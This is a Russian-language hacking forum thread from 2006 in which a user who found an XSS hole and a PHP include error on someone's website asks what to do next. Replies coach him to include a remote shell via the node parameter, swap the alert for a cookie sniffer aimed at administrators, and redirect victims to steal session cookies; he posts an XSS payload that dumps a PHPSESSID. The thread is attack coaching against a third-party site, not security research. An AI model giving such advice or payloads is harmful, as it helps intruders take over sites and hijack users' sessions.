HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ОФФТОП > Болталка
Перезагрузить страницу Подскажите, что следует делать дальше...
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Подскажите, что следует делать дальше...
  #1  
Старый 14.01.2006, 14:57
Jonathan Allen
Познающий
Регистрация: 21.03.2005
Сообщений: 71
Провел на форуме:
516278

Репутация: 15
По умолчанию Подскажите, что следует делать дальше...
Есть сайт, работает xss

Если написать вот так:

http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script>

То, как видно из скрипта - вылетает табличка с название сайта. Работет и такое, например....

http://[САЙТ]/?node=tralala

Соответственно имеем такое:

Warning: main(pages/tralala.php): failed to open stream: No such file or directory in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5

Код:
Warning: main(): Failed opening 'pages/tralala.php' for inclusion (include_path='.:/usr/share/php') in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5
И так далее...


Скажите, пожалуйста, что делать дальше?
 

  #2  
Старый 14.01.2006, 19:05
TTyck
Участник форума
Регистрация: 13.11.2005
Сообщений: 199
Провел на форуме:
824195

Репутация: 75
Отправить сообщение для TTyck с помощью ICQ
По умолчанию
поставляй вместо тралала адрес на шел, предварительно тобой залитый на бесплатный хостинг.
 

  #3  
Старый 14.01.2006, 19:11
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию
буит примерно так http://[САЙТ]/?node=http://site.narod.ru/shell.php
Удачи тебе)))
 

  #4  
Старый 14.01.2006, 19:50
dim_ok
Green member - Level 3
Регистрация: 26.03.2005
Сообщений: 191
Провел на форуме:
6768708

Репутация: 185
По умолчанию
ну с http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script> это только менять алерт на ссылу со сниффером и пробовать подсовывать админам и т.п. вообщем прилигированным пользователям, и то если там используются куки для авторизации
а с http://[САЙТ]/?node=tralala у тебя ничего не выйдет т.к. ты не сможешь выдти за пределы папки pages
__________________
Дайте мне точку опоры и я переверну землю!

irc.antichat.net #antichat
 

  #5  
Старый 14.01.2006, 20:19
Jonathan Allen
Познающий
Регистрация: 21.03.2005
Сообщений: 71
Провел на форуме:
516278

Репутация: 15
По умолчанию
Спасибо, ребята но с шеллом ничего не вышло...


dim_ok

Если сдеать вот так:

http://[САЙТ]/?node=></td></tr></form></table><script>alert(document.cookie);</script>

То мне вылетает такое сообщение

PHPSESSID=76a45e1a35900e78ddfb180e83a6b379;_c=y


Это что-то дает? Или находу генерирует?
 

  #6  
Старый 14.01.2006, 23:47
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
Делай редирект на страницу и засовывай туда Java script код чтобы угонять куки посмотреть его можно на главной странице античате где идёт надрись"описание снифера".
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Выполняется sql inj что делать дальше?) zveri Болталка 1 04.08.2005 23:37
подскажите что эта ссылка умеет делать Orlow Болталка 1 20.07.2005 04:01
Нашел дыру, но не знаю че делать дальше - помогите новичку :) m4e Болталка 21 23.06.2005 15:45
ПОДСКАЖИТЕ что делать дальше?! ][s0u1 Болталка 24 30.04.2005 10:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ